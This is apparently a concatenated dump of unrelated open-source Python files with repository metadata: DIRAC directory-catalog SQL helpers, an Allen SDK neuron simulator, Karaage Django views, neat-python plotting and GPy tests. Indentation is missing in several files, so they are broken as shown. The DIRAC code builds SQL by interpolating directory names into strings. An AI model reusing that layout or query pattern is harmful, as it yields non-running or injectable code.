return S_OK(result["Value"][0][0])
def makeDir(self, path):
"""Create a single directory"""
result = self.findDir(path)
if not result["OK"]:
return result
dirID = result["Value"]
if dirID:
return S_OK(dirID)
dpath = path
if path[0] == "/":
dpath = path[1:]
elements = dpath.split("/")
level = len(elements)
dirName = elements[-1]
result = self.getParent(path)
if not result["OK"]:
return result
parentDirID = result["Value"]
names = ["DirName", "Level", "Parent"]
values = [dirName, level, parentDirID]
result = self.db.insertFields("FC_DirectoryTreeM", names, values)
if not result["OK"]:
return result
return S_OK(result["lastRowId"])
def existsDir(self, path):
"""Check the existence of a directory at the specified path"""
result = self.findDir(path)
if not result["OK"]:
return result
if not result["Value"]:
return S_OK({"Exists": False})
else:
return S_OK({"Exists": True, "DirID": result["Value"]})
def getParent(self, path):
"""Get the parent ID of the given directory"""
dpath = path
if path[0] == "/":
dpath = path[1:]
elements = dpath.split("/")
if len(elements) > 1:
parentDir = os.path.dirname(path)
result = self.findDir(parentDir)
if not result["OK"]:
return result
parentDirID = result["Value"]
if not parentDirID:
return S_ERROR("No parent directory")
return S_OK(parentDirID)
else:
return S_OK(0)
def getParentID(self, dirID):
""" """
if dirID == 0:
return S_ERROR("Root directory ID given")
req = "SELECT Parent FROM FC_DirectoryTreeM WHERE DirID=%d" % dirID
result = self.db._query(req)
if not result["OK"]:
return result
if not result["Value"]:
return S_ERROR("No parent found")
return S_OK(result["Value"][0][0])
def getDirectoryName(self, dirID):
"""Get directory name by directory ID"""
req = "SELECT DirName FROM FC_DirectoryTreeM WHERE DirID=%d" % int(dirID)
result = self.db._query(req)
if not result["OK"]:
return result
if not result["Value"]:
return S_ERROR("Directory with id %d not found" % int(dirID))
return S_OK(result["Value"][0][0])
def getDirectoryPath(self, dirID):
"""Get directory path by directory ID"""
dirPath = ""
dID = dirID
while True:
result = self.getDirectoryName(dID)
if not result["OK"]:
return result
dirPath = "/" + result["Value"] + dirPath
result = self.getParentID(dID)
if not result["OK"]:
return result
if result["Value"] == 0:
break
else:
dID = result["Value"]
return S_OK("/" + dirPath)
def getPathIDs(self, path):
"""Get IDs of all the directories in the parent hierarchy"""
result = self.findDir(path)
if not result["OK"]:
return result
dID = result["Value"]
parentIDs = []
        while True:
            # walking up by ID requires getParentID; getParent expects a path
            result = self.getParentID(dID)
            if not result["OK"]:
                return result
            dID = result["Value"]
            if dID == 0:
                break
            parentIDs.append(dID)
        parentIDs.append(0)
        parentIDs.reverse()
return S_OK(parentIDs)
def getChildren(self, path):
"""Get child directory IDs for the given directory"""
if isinstance(path, str):
result = self.findDir(path)
if not result["OK"]:
return result
dirID = result["Value"]
else:
dirID = path
req = "SELECT DirID FROM FC_DirectoryTreeM WHERE Parent=%d" % dirID
result = self.db._query(req)
if not result["OK"]:
return result
if not result["Value"]:
return S_OK([])
return S_OK([x[0] for x in result["Value"]])
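# Because findDir builds one nested SELECT per path component, it can help to
# see the SQL it generates. This standalone sketch reproduces the construction
# for '/a/b/c' without a DIRAC database; the table name matches the class above.
def build_find_dir_query(path):
    """Reproduce findDir's nested SELECT for a path such as '/a/b/c'."""
    elements = path.lstrip("/").split("/")
    req = " "
    for level in range(len(elements), 0, -1):
        if level > 1:
            req += "SELECT DirID from FC_DirectoryTreeM WHERE Level=%d AND DirName='%s' AND Parent=(" % (
                level,
                elements[level - 1],
            )
        else:
            req += "SELECT DirID from FC_DirectoryTreeM WHERE Level=%d AND DirName='%s'" % (
                level,
                elements[level - 1],
            )
    req += ")" * (len(elements) - 1)
    return req

print(build_find_dir_query("/a/b/c"))
# -> ... Level=3 AND DirName='c' AND Parent=(... Level=2 AND DirName='b'
#        AND Parent=(... Level=1 AND DirName='a'))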
|
DIRACGrid/DIRAC
|
src/DIRAC/DataManagementSystem/DB/FileCatalogComponents/DirectoryManager/DirectoryNodeTree.py
|
Python
|
gpl-3.0
| 5,866
|
[
"DIRAC"
] |
17ccab40d3db527df4871e83b6454394ed5950d6ccd5a93e7341f6ee91dbba6f
|
# Copyright 2015 Allen Institute for Brain Science
# This file is part of Allen SDK.
#
# Allen SDK is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, version 3 of the License.
#
# Allen SDK is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Allen SDK. If not, see <http://www.gnu.org/licenses/>.
import logging, time
import argparse, os
import numpy as np
import allensdk.core.json_utilities as json_utilities
from allensdk.core.nwb_data_set import NwbDataSet
from allensdk.api.queries.glif_api import GlifApi
from allensdk.model.glif.glif_neuron import GlifNeuron
DEFAULT_SPIKE_CUT_VALUE = 0.05 # 50mV
def parse_arguments():
''' Use argparse to get required arguments from the command line '''
parser = argparse.ArgumentParser(description='fit a neuron')
parser.add_argument('--ephys_file', help='ephys file name')
parser.add_argument('--sweeps_file', help='JSON file listing sweep properties')
parser.add_argument('--neuron_config_file', help='neuron configuration JSON file ')
parser.add_argument('--neuronal_model_id', help='id of the neuronal model. Used when downloading sweep properties.', type=int)
parser.add_argument('--output_ephys_file', help='output file name')
parser.add_argument('--log_level', help='log level', default=logging.INFO)
parser.add_argument('--spike_cut_value', help='value to fill in for spike duration', default=DEFAULT_SPIKE_CUT_VALUE, type=float)
return parser.parse_args()
def simulate_sweep(neuron, stimulus, spike_cut_value):
''' Simulate a neuron given a stimulus and initial conditions. '''
start_time = time.time()
logging.debug("simulating")
data = neuron.run(stimulus)
voltage = data['voltage']
voltage[np.isnan(voltage)] = spike_cut_value
logging.debug("simulation time %f" % (time.time() - start_time))
return data
def load_sweep(file_name, sweep_number):
''' Load the stimulus for a sweep from file. '''
logging.debug("loading sweep %d" % sweep_number)
load_start_time = time.time()
data = NwbDataSet(file_name).get_sweep(sweep_number)
logging.debug("load time %f" % (time.time() - load_start_time))
return data
def write_sweep_response(file_name, sweep_number, response, spike_times):
''' Overwrite the response in a file. '''
logging.debug("writing sweep")
write_start_time = time.time()
ephds = NwbDataSet(file_name)
ephds.set_sweep(sweep_number, stimulus=None, response=response)
ephds.set_spike_times(sweep_number, spike_times)
logging.debug("write time %f" % (time.time() - write_start_time))
def simulate_sweep_from_file(neuron, sweep_number, input_file_name, output_file_name, spike_cut_value):
''' Load a sweep stimulus, simulate the response, and write it out. '''
sweep_start_time = time.time()
try:
data = load_sweep(input_file_name, sweep_number)
    except Exception as e:
logging.warning("Failed to load sweep, skipping. (%s)" % str(e))
raise
# tell the neuron what dt should be for this sweep
neuron.dt = 1.0 / data['sampling_rate']
sim_data = simulate_sweep(neuron, data['stimulus'], spike_cut_value)
write_sweep_response(output_file_name, sweep_number, sim_data['voltage'], sim_data['interpolated_spike_times'])
logging.debug("total sweep time %f" % ( time.time() - sweep_start_time ))
def simulate_neuron(neuron, sweep_numbers, input_file_name, output_file_name, spike_cut_value):
start_time = time.time()
for sweep_number in sweep_numbers:
simulate_sweep_from_file(neuron, sweep_number, input_file_name, output_file_name, spike_cut_value)
logging.debug("total elapsed time %f" % (time.time() - start_time))
def main():
args = parse_arguments()
logging.getLogger().setLevel(args.log_level)
glif_api = None
if (args.neuron_config_file is None or
args.sweeps_file is None or
args.ephys_file is None):
        assert args.neuronal_model_id is not None, \
            "A neuronal model id is required if no neuron config file, sweeps file, or ephys data file is provided."
glif_api = GlifApi()
glif_api.get_neuronal_model(args.neuronal_model_id)
if args.neuron_config_file:
neuron_config = json_utilities.read(args.neuron_config_file)
else:
neuron_config = glif_api.get_neuron_config()
if args.sweeps_file:
sweeps = json_utilities.read(args.sweeps_file)
else:
sweeps = glif_api.get_ephys_sweeps()
if args.ephys_file:
ephys_file = args.ephys_file
else:
ephys_file = 'stimulus_%d.nwb' % args.neuronal_model_id
if not os.path.exists(ephys_file):
logging.info("Downloading stimulus to %s." % ephys_file)
glif_api.cache_stimulus_file(ephys_file)
else:
logging.warning("Reusing %s because it already exists." % ephys_file)
if args.output_ephys_file:
output_ephys_file = args.output_ephys_file
else:
logging.warning("Overwriting input file data with simulated data in place.")
output_ephys_file = ephys_file
neuron = GlifNeuron.from_dict(neuron_config)
# filter out test sweeps
sweep_numbers = [ s['sweep_number'] for s in sweeps if s['stimulus_name'] != 'Test' ]
simulate_neuron(neuron, sweep_numbers, ephys_file, output_ephys_file, args.spike_cut_value)
if __name__ == "__main__": main()
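# Stripped of the command-line plumbing, the core of the script is: build a
# GlifNeuron from a config, set dt from the sweep's sampling rate, run the
# stimulus, and fill the NaN spike samples. A hedged sketch with a synthetic
# stimulus; the neuronal model id is hypothetical (any public GLIF model id
# would do) and fetching the config requires network access.
import numpy as np
from allensdk.api.queries.glif_api import GlifApi
from allensdk.model.glif.glif_neuron import GlifNeuron

glif_api = GlifApi()
glif_api.get_neuronal_model(566302806)       # hypothetical model id
neuron = GlifNeuron.from_dict(glif_api.get_neuron_config())

neuron.dt = 5e-6                             # as a 200 kHz sweep would set it
stimulus = np.zeros(200000)
stimulus[50000:150000] = 1e-10               # 0.1 nA current step
data = neuron.run(stimulus)
voltage = data['voltage']
voltage[np.isnan(voltage)] = 0.05            # DEFAULT_SPIKE_CUT_VALUE fill, as above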
|
wvangeit/AllenSDK
|
allensdk/model/glif/simulate_neuron.py
|
Python
|
gpl-3.0
| 5,862
|
[
"NEURON"
] |
bef7522357adf09f9880d910dccbc1dd1cf2b8f0c15efd4a17cebe0c237be788
|
# Copyright 2010-2017, The University of Melbourne
# Copyright 2010-2017, Brian May
#
# This file is part of Karaage.
#
# Karaage is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Karaage is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Karaage If not, see <http://www.gnu.org/licenses/>.
""" This file shows the project application views using a state machine. """
from django.conf import settings
from django.http import HttpResponseForbidden, HttpResponseRedirect
from django.shortcuts import get_object_or_404, render
from django.urls import reverse
from karaage.common import is_admin
from karaage.common.decorators import login_required
from karaage.people.models import Person
from karaage.projects.models import Project
from .. import forms
from ..models import Applicant, ProjectApplication
from . import base
def get_application_state_machine():
""" Get the default state machine for applications. """
config = settings.APPLICATION_PROJECT
state_machine = base.StateMachine(config)
return state_machine
def register():
base.setup_application_type(
ProjectApplication, get_application_state_machine())
def get_applicant_from_email(email):
"""
Get applicant from email address.
If the person exists, return (None, person)
If multiple matches, return (None, None)
Otherwise create applicant and return (applicant, None)
"""
try:
applicant = None
existing_person = Person.active.get(email=email)
except Person.DoesNotExist:
applicant = Applicant.objects.create(email=email)
existing_person = None
    except Person.MultipleObjectsReturned:
        # multiple matches: return (None, None), as the docstring promises,
        # so the caller's "applicant is None and existing_person is None"
        # branch can render the invite_multiple template
        applicant = None
        existing_person = None
return applicant, existing_person
def _send_invitation(request, project):
""" The logged in project leader OR administrator wants to invite somebody.
"""
form = forms.InviteUserApplicationForm(request.POST or None)
if request.method == 'POST':
if form.is_valid():
email = form.cleaned_data['email']
applicant, existing_person = get_applicant_from_email(email)
# If applicant is None then there were multiple persons found.
if applicant is None and existing_person is None:
return render(
template_name='kgapplications/'
'project_common_invite_multiple.html',
context={'form': form, 'email': email},
request=request)
if existing_person is not None and 'existing' not in request.POST:
return render(
template_name='kgapplications/'
'project_common_invite_existing.html',
                    context={'form': form, 'person': existing_person},
request=request)
application = form.save(commit=False)
application.new_applicant = applicant
application.existing_person = existing_person
application.project = project
application.save()
state_machine = get_application_state_machine()
response = state_machine.start(request, application)
return response
return render(
template_name='kgapplications/project_common_invite_other.html',
context={'form': form, 'project': project, },
request=request)
@login_required
def send_invitation(request, project_id=None):
""" The logged in project leader wants to invite somebody to their project.
"""
project = None
if project_id is not None:
project = get_object_or_404(Project, id=project_id)
if project is None:
if not is_admin(request):
return HttpResponseForbidden('<h1>Access Denied</h1>')
else:
if not project.can_edit(request):
return HttpResponseForbidden('<h1>Access Denied</h1>')
return _send_invitation(request, project)
def new_application(request):
""" A new application by a user to start a new project. """
# Note default kgapplications/index.html will display error if user logged
# in.
if not settings.ALLOW_REGISTRATIONS:
return render(
template_name='kgapplications/project_common_disabled.html',
context={},
request=request)
roles = {'is_applicant', 'is_authorised'}
if not request.user.is_authenticated:
defaults = {}
form = forms.UnauthenticatedInviteUserApplicationForm(
request.POST or None, initial=defaults)
if request.method == 'POST':
if form.is_valid():
email = form.cleaned_data['email']
applicant, existing_person = get_applicant_from_email(email)
# If applicant is None then there were multiple persons found.
# This should never happen as the
# UnauthenticatedInviteUserApplicationForm form disallows
# existing users applying unauthenticated.
assert applicant is not None
# Similarly existing_person should always be None here.
assert existing_person is None
application = ProjectApplication()
application.new_applicant = applicant
application.save()
state_machine = get_application_state_machine()
state_machine.start(request, application, roles)
# we do not show unauthenticated users the application at this
# stage.
url = reverse('index')
return HttpResponseRedirect(url)
return render(
template_name='kgapplications/'
'project_common_invite_unauthenticated.html',
context={'form': form, },
request=request)
else:
if request.method == 'POST':
person = request.user
application = ProjectApplication()
application.existing_person = person
application.save()
state_machine = get_application_state_machine()
response = state_machine.start(request, application, roles)
return response
return render(
template_name='kgapplications/'
'project_common_invite_authenticated.html',
context={},
request=request)
|
brianmay/karaage
|
karaage/plugins/kgapplications/views/project.py
|
Python
|
gpl-3.0
| 6,844
|
[
"Brian"
] |
8389a715c36d98ef34d6515aa66699400e3b2db62aace2a4936b6068f19e3fb5
|
# -*- coding: utf-8 -*-
__all__ = [
"StretchMove",
"WalkMove",
"DEMove",
"KDEMove",
"MHMove",
"GaussianMove",
"HamiltonianMove",
"NoUTurnsMove",
]
from .walk import WalkMove
from .stretch import StretchMove
from .de import DEMove
from .kde import KDEMove
from .mh import MHMove
from .gaussian import GaussianMove
from .hmc import HamiltonianMove
from .nuts import NoUTurnsMove
|
jellis18/emcee3
|
emcee3/moves/__init__.py
|
Python
|
mit
| 413
|
[
"Gaussian"
] |
c85ac07d2405f91abc817545975647d2dae82126dcaaadee689e0b4a9d755e5d
|
from __future__ import print_function
import copy
import warnings

import numpy as np

# Guard the optional dependencies so the `is None` checks below are meaningful.
try:
    import graphviz
except ImportError:
    graphviz = None
try:
    import matplotlib.pyplot as plt
except ImportError:
    plt = None
def plot_stats(statistics, ylog=False, view=False, filename='avg_fitness.svg'):
""" Plots the population's average and best fitness. """
if plt is None:
warnings.warn("This display is not available due to a missing optional dependency (matplotlib)")
return
generation = range(len(statistics.most_fit_genomes))
best_fitness = [c.fitness for c in statistics.most_fit_genomes]
avg_fitness = np.array(statistics.get_fitness_mean())
stdev_fitness = np.array(statistics.get_fitness_stdev())
plt.plot(generation, avg_fitness, 'b-', label="average")
plt.plot(generation, avg_fitness - stdev_fitness, 'g-.', label="-1 sd")
plt.plot(generation, avg_fitness + stdev_fitness, 'g-.', label="+1 sd")
plt.plot(generation, best_fitness, 'r-', label="best")
plt.title("Population's average and best fitness")
plt.xlabel("Generations")
plt.ylabel("Fitness")
plt.grid()
plt.legend(loc="best")
if ylog:
plt.gca().set_yscale('symlog')
plt.savefig(filename)
if view:
plt.show()
plt.close()
def plot_spikes(spikes, view=False, filename=None, title=None):
""" Plots the trains for a single spiking neuron. """
if plt is None:
warnings.warn("This display is not available due to a missing optional dependency (matplotlib)")
return
t_values = [t for t, I, v, u in spikes]
v_values = [v for t, I, v, u in spikes]
u_values = [u for t, I, v, u in spikes]
I_values = [I for t, I, v, u in spikes]
fig = plt.figure()
plt.subplot(3, 1, 1)
plt.ylabel("Potential (mv)")
plt.xlabel("Time (in ms)")
plt.grid()
plt.plot(t_values, v_values, "g-")
if title is None:
plt.title("Izhikevich's spiking neuron model")
else:
plt.title("Izhikevich's spiking neuron model ({0!s})".format(title))
plt.subplot(3, 1, 2)
plt.ylabel("Recovery (u)")
plt.xlabel("Time (in ms)")
plt.grid()
plt.plot(t_values, u_values, "r-")
plt.subplot(3, 1, 3)
plt.ylabel("Current (I)")
plt.xlabel("Time (in ms)")
plt.grid()
plt.plot(t_values, I_values, "r-o")
    if filename is not None:
        plt.savefig(filename)
        plt.close()
        fig = None
    if view:
        plt.show()
        plt.close()
        fig = None
    return fig
def plot_species(statistics, view=False, filename='speciation.svg'):
""" Visualizes speciation throughout evolution. """
if plt is None:
warnings.warn("This display is not available due to a missing optional dependency (matplotlib)")
return
species_sizes = statistics.get_species_sizes()
num_generations = len(species_sizes)
curves = np.array(species_sizes).T
fig, ax = plt.subplots()
ax.stackplot(range(num_generations), *curves)
plt.title("Speciation")
plt.ylabel("Size per Species")
plt.xlabel("Generations")
plt.savefig(filename)
if view:
plt.show()
plt.close()
def draw_net(config, genome, view=False, filename=None, node_names=None, show_disabled=True, prune_unused=False,
node_colors=None, fmt='svg'):
""" Receives a genome and draws a neural network with arbitrary topology. """
# Attributes for network nodes.
if graphviz is None:
warnings.warn("This display is not available due to a missing optional dependency (graphviz)")
return
if node_names is None:
node_names = {}
assert type(node_names) is dict
if node_colors is None:
node_colors = {}
assert type(node_colors) is dict
node_attrs = {
'shape': 'circle',
'fontsize': '9',
'height': '0.2',
'width': '0.2'}
dot = graphviz.Digraph(format=fmt, node_attr=node_attrs)
inputs = set()
for k in config.genome_config.input_keys:
inputs.add(k)
name = node_names.get(k, str(k))
input_attrs = {'style': 'filled',
'shape': 'box'}
input_attrs['fillcolor'] = node_colors.get(k, 'lightgray')
dot.node(name, _attributes=input_attrs)
outputs = set()
for k in config.genome_config.output_keys:
outputs.add(k)
name = node_names.get(k, str(k))
node_attrs = {'style': 'filled'}
node_attrs['fillcolor'] = node_colors.get(k, 'lightblue')
dot.node(name, _attributes=node_attrs)
if prune_unused:
connections = set()
for cg in genome.connections.values():
if cg.enabled or show_disabled:
                connections.add(cg.key)  # cg.key is the (input, output) pair used below
used_nodes = copy.copy(outputs)
pending = copy.copy(outputs)
while pending:
#print(pending, used_nodes)
new_pending = set()
for a, b in connections:
if b in pending and a not in used_nodes:
new_pending.add(a)
used_nodes.add(a)
pending = new_pending
else:
used_nodes = set(genome.nodes.keys())
for n in used_nodes:
if n in inputs or n in outputs:
continue
attrs = {'style': 'filled'}
attrs['fillcolor'] = node_colors.get(n, 'white')
dot.node(str(n), _attributes=attrs)
for cg in genome.connections.values():
if cg.enabled or show_disabled:
#if cg.input not in used_nodes or cg.output not in used_nodes:
# continue
input, output = cg.key
a = node_names.get(input, str(input))
b = node_names.get(output, str(output))
style = 'solid' if cg.enabled else 'dotted'
color = 'green' if cg.weight > 0 else 'red'
width = str(0.1 + abs(cg.weight / 5.0))
dot.edge(a, b, _attributes={'style': style, 'color': color, 'penwidth': width})
dot.render(filename, view=view)
return dot
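# The edge-styling rule buried in draw_net (solid/dotted for enabled state,
# green/red by weight sign, pen width from |weight|) in isolation; a minimal
# sketch assuming only the graphviz package, with hypothetical node names:
import graphviz

dot = graphviz.Digraph(format='svg')
for name, weight, enabled in [('a', 0.8, True), ('b', -2.0, True), ('c', 1.0, False)]:
    style = 'solid' if enabled else 'dotted'
    color = 'green' if weight > 0 else 'red'
    width = str(0.1 + abs(weight / 5.0))
    dot.edge(name, 'out', _attributes={'style': style, 'color': color, 'penwidth': width})
dot.render('edge_styles', view=False)   # writes edge_styles.svg alongside the source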
|
drallensmith/neat-python
|
examples/memory-variable/visualize.py
|
Python
|
bsd-3-clause
| 5,965
|
[
"NEURON"
] |
fa317a34b9d4f844cadfd280f8d2ef31cd706a7518a6ce37067827ac8774da1a
|
# Copyright (c) 2012, GPy authors (see AUTHORS.txt).
# Licensed under the BSD 3-clause license (see LICENSE.txt)
import unittest
import numpy as np
import GPy
class MiscTests(unittest.TestCase):
def setUp(self):
self.N = 20
self.N_new = 50
self.D = 1
self.X = np.random.uniform(-3., 3., (self.N, 1))
self.Y = np.sin(self.X) + np.random.randn(self.N, self.D) * 0.05
self.X_new = np.random.uniform(-3., 3., (self.N_new, 1))
def test_setXY(self):
m = GPy.models.GPRegression(self.X, self.Y)
m.set_XY(np.vstack([self.X, np.random.rand(1,self.X.shape[1])]), np.vstack([self.Y, np.random.rand(1,self.Y.shape[1])]))
m._trigger_params_changed()
self.assertTrue(m.checkgrad())
m.predict(m.X)
def test_raw_predict_numerical_stability(self):
"""
Test whether the predicted variance of normal GP goes negative under numerical unstable situation.
Thanks simbartonels@github for reporting the bug and providing the following example.
"""
        # set seed for reproducibility
np.random.seed(3)
# Definition of the Branin test function
def branin(X):
y = (X[:,1]-5.1/(4*np.pi**2)*X[:,0]**2+5*X[:,0]/np.pi-6)**2
y += 10*(1-1/(8*np.pi))*np.cos(X[:,0])+10
return(y)
# Training set defined as a 5*5 grid:
xg1 = np.linspace(-5,10,5)
xg2 = np.linspace(0,15,5)
X = np.zeros((xg1.size * xg2.size,2))
for i,x1 in enumerate(xg1):
for j,x2 in enumerate(xg2):
X[i+xg1.size*j,:] = [x1,x2]
Y = branin(X)[:,None]
# Fit a GP
# Create an exponentiated quadratic plus bias covariance function
k = GPy.kern.RBF(input_dim=2, ARD = True)
# Build a GP model
m = GPy.models.GPRegression(X,Y,k)
# fix the noise variance
m.likelihood.variance.fix(1e-5)
# Randomize the model and optimize
m.randomize()
m.optimize()
# Compute the mean of model prediction on 1e5 Monte Carlo samples
        Xp = np.random.uniform(size=(int(1e5), 2))  # array shapes must be ints
Xp[:,0] = Xp[:,0]*15-5
Xp[:,1] = Xp[:,1]*15
_, var = m.predict(Xp)
self.assertTrue(np.all(var>=0.))
def test_raw_predict(self):
k = GPy.kern.RBF(1)
m = GPy.models.GPRegression(self.X, self.Y, kernel=k)
m.randomize()
m.likelihood.variance = .5
Kinv = np.linalg.pinv(k.K(self.X) + np.eye(self.N) * m.likelihood.variance)
K_hat = k.K(self.X_new) - k.K(self.X_new, self.X).dot(Kinv).dot(k.K(self.X, self.X_new))
mu_hat = k.K(self.X_new, self.X).dot(Kinv).dot(m.Y_normalized)
mu, covar = m.predict_noiseless(self.X_new, full_cov=True)
self.assertEquals(mu.shape, (self.N_new, self.D))
self.assertEquals(covar.shape, (self.N_new, self.N_new))
np.testing.assert_almost_equal(K_hat, covar)
np.testing.assert_almost_equal(mu_hat, mu)
mu, var = m.predict_noiseless(self.X_new)
self.assertEquals(mu.shape, (self.N_new, self.D))
self.assertEquals(var.shape, (self.N_new, 1))
np.testing.assert_almost_equal(np.diag(K_hat)[:, None], var)
np.testing.assert_almost_equal(mu_hat, mu)
def test_normalizer(self):
k = GPy.kern.RBF(1)
Y = self.Y
mu, std = Y.mean(0), Y.std(0)
m = GPy.models.GPRegression(self.X, Y, kernel=k, normalizer=True)
m.optimize(messages=True)
assert(m.checkgrad())
k = GPy.kern.RBF(1)
m2 = GPy.models.GPRegression(self.X, (Y-mu)/std, kernel=k, normalizer=False)
m2[:] = m[:]
mu1, var1 = m.predict(m.X, full_cov=True)
mu2, var2 = m2.predict(m2.X, full_cov=True)
np.testing.assert_allclose(mu1, (mu2*std)+mu)
np.testing.assert_allclose(var1, var2)
mu1, var1 = m.predict(m.X, full_cov=False)
mu2, var2 = m2.predict(m2.X, full_cov=False)
np.testing.assert_allclose(mu1, (mu2*std)+mu)
np.testing.assert_allclose(var1, var2)
q50n = m.predict_quantiles(m.X, (50,))
q50 = m2.predict_quantiles(m2.X, (50,))
np.testing.assert_allclose(q50n[0], (q50[0]*std)+mu)
def check_jacobian(self):
try:
import autograd.numpy as np, autograd as ag, GPy, matplotlib.pyplot as plt
from GPy.models import GradientChecker, GPRegression
except:
raise self.skipTest("autograd not available to check gradients")
def k(X, X2, alpha=1., lengthscale=None):
if lengthscale is None:
lengthscale = np.ones(X.shape[1])
exp = 0.
for q in range(X.shape[1]):
exp += ((X[:, [q]] - X2[:, [q]].T)/lengthscale[q])**2
#exp = np.sqrt(exp)
return alpha * np.exp(-.5*exp)
dk = ag.elementwise_grad(lambda x, x2: k(x, x2, alpha=ke.variance.values, lengthscale=ke.lengthscale.values))
dkdk = ag.elementwise_grad(dk, argnum=1)
ke = GPy.kern.RBF(1, ARD=True)
#ke.randomize()
ke.variance = .2#.randomize()
ke.lengthscale[:] = .5
ke.randomize()
X = np.linspace(-1, 1, 1000)[:,None]
X2 = np.array([[0.]]).T
np.testing.assert_allclose(ke.gradients_X([[1.]], X, X), dk(X, X))
np.testing.assert_allclose(ke.gradients_XX([[1.]], X, X).sum(0), dkdk(X, X))
np.testing.assert_allclose(ke.gradients_X([[1.]], X, X2), dk(X, X2))
np.testing.assert_allclose(ke.gradients_XX([[1.]], X, X2).sum(0), dkdk(X, X2))
m = GPRegression(self.X, self.Y)
def f(x):
m.X[:] = x
return m.log_likelihood()
def df(x):
m.X[:] = x
return m.kern.gradients_X(m.grad_dict['dL_dK'], X)
def ddf(x):
m.X[:] = x
return m.kern.gradients_XX(m.grad_dict['dL_dK'], X).sum(0)
gc = GradientChecker(f, df, self.X)
gc2 = GradientChecker(df, ddf, self.X)
assert(gc.checkgrad())
assert(gc2.checkgrad())
def test_predict_uncertain_inputs(self):
""" Projection of Gaussian through a linear function is still gaussian, and moments are analytical to compute, so we can check this case for predictions easily """
X = np.linspace(-5,5, 10)[:, None]
Y = 2*X + np.random.randn(*X.shape)*1e-3
m = GPy.models.BayesianGPLVM(Y, 1, X=X, kernel=GPy.kern.Linear(1), num_inducing=1)
m.Gaussian_noise[:] = 1e-4
m.X.mean[:] = X[:]
m.X.variance[:] = 1e-5
m.X.fix()
m.optimize()
X_pred_mu = np.random.randn(5, 1)
X_pred_var = np.random.rand(5, 1) + 1e-5
from GPy.core.parameterization.variational import NormalPosterior
X_pred = NormalPosterior(X_pred_mu, X_pred_var)
# mu = \int f(x)q(x|mu,S) dx = \int 2x.q(x|mu,S) dx = 2.mu
# S = \int (f(x) - m)^2q(x|mu,S) dx = \int f(x)^2 q(x) dx - mu**2 = 4(mu^2 + S) - (2.mu)^2 = 4S
Y_mu_true = 2*X_pred_mu
Y_var_true = 4*X_pred_var
Y_mu_pred, Y_var_pred = m.predict_noiseless(X_pred)
np.testing.assert_allclose(Y_mu_true, Y_mu_pred, rtol=1e-4)
np.testing.assert_allclose(Y_var_true, Y_var_pred, rtol=1e-4)
def test_sparse_raw_predict(self):
k = GPy.kern.RBF(1)
m = GPy.models.SparseGPRegression(self.X, self.Y, kernel=k)
m.randomize()
Z = m.Z[:]
# Not easy to check if woodbury_inv is correct in itself as it requires a large derivation and expression
Kinv = m.posterior.woodbury_inv
K_hat = k.K(self.X_new) - k.K(self.X_new, Z).dot(Kinv).dot(k.K(Z, self.X_new))
K_hat = np.clip(K_hat, 1e-15, np.inf)
mu, covar = m.predict_noiseless(self.X_new, full_cov=True)
self.assertEquals(mu.shape, (self.N_new, self.D))
self.assertEquals(covar.shape, (self.N_new, self.N_new))
np.testing.assert_almost_equal(K_hat, covar)
# np.testing.assert_almost_equal(mu_hat, mu)
mu, var = m.predict_noiseless(self.X_new)
self.assertEquals(mu.shape, (self.N_new, self.D))
self.assertEquals(var.shape, (self.N_new, 1))
np.testing.assert_almost_equal(np.diag(K_hat)[:, None], var)
# np.testing.assert_almost_equal(mu_hat, mu)
def test_likelihood_replicate(self):
m = GPy.models.GPRegression(self.X, self.Y)
m2 = GPy.models.GPRegression(self.X, self.Y)
np.testing.assert_equal(m.log_likelihood(), m2.log_likelihood())
m.randomize()
m2[:] = m[''].values()
np.testing.assert_almost_equal(m.log_likelihood(), m2.log_likelihood())
m.randomize()
m2[''] = m[:]
np.testing.assert_almost_equal(m.log_likelihood(), m2.log_likelihood())
m.randomize()
m2[:] = m[:]
np.testing.assert_almost_equal(m.log_likelihood(), m2.log_likelihood())
m.randomize()
m2[''] = m['']
np.testing.assert_almost_equal(m.log_likelihood(), m2.log_likelihood())
m.kern.lengthscale.randomize()
m2[:] = m[:]
np.testing.assert_almost_equal(m.log_likelihood(), m2.log_likelihood())
m.Gaussian_noise.randomize()
m2[:] = m[:]
np.testing.assert_almost_equal(m.log_likelihood(), m2.log_likelihood())
m['.*var'] = 2
m2['.*var'] = m['.*var']
np.testing.assert_almost_equal(m.log_likelihood(), m2.log_likelihood())
def test_likelihood_set(self):
m = GPy.models.GPRegression(self.X, self.Y)
m2 = GPy.models.GPRegression(self.X, self.Y)
np.testing.assert_equal(m.log_likelihood(), m2.log_likelihood())
m.kern.lengthscale.randomize()
m2.kern.lengthscale = m.kern.lengthscale
np.testing.assert_equal(m.log_likelihood(), m2.log_likelihood())
m.kern.lengthscale.randomize()
m2['.*lengthscale'] = m.kern.lengthscale
np.testing.assert_equal(m.log_likelihood(), m2.log_likelihood())
m.kern.lengthscale.randomize()
m2['.*lengthscale'] = m.kern['.*lengthscale']
np.testing.assert_equal(m.log_likelihood(), m2.log_likelihood())
m.kern.lengthscale.randomize()
m2.kern.lengthscale = m.kern['.*lengthscale']
np.testing.assert_equal(m.log_likelihood(), m2.log_likelihood())
def test_missing_data(self):
from GPy import kern
from GPy.models.bayesian_gplvm_minibatch import BayesianGPLVMMiniBatch
from GPy.examples.dimensionality_reduction import _simulate_matern
D1, D2, D3, N, num_inducing, Q = 13, 5, 8, 400, 3, 4
_, _, Ylist = _simulate_matern(D1, D2, D3, N, num_inducing, False)
Y = Ylist[0]
        inan = np.random.binomial(1, .9, size=Y.shape).astype(bool)  # ~90% missing data
Ymissing = Y.copy()
Ymissing[inan] = np.nan
k = kern.Linear(Q, ARD=True) + kern.White(Q, np.exp(-2)) # + kern.bias(Q)
m = BayesianGPLVMMiniBatch(Ymissing, Q, init="random", num_inducing=num_inducing,
kernel=k, missing_data=True)
assert(m.checkgrad())
mul, varl = m.predict(m.X)
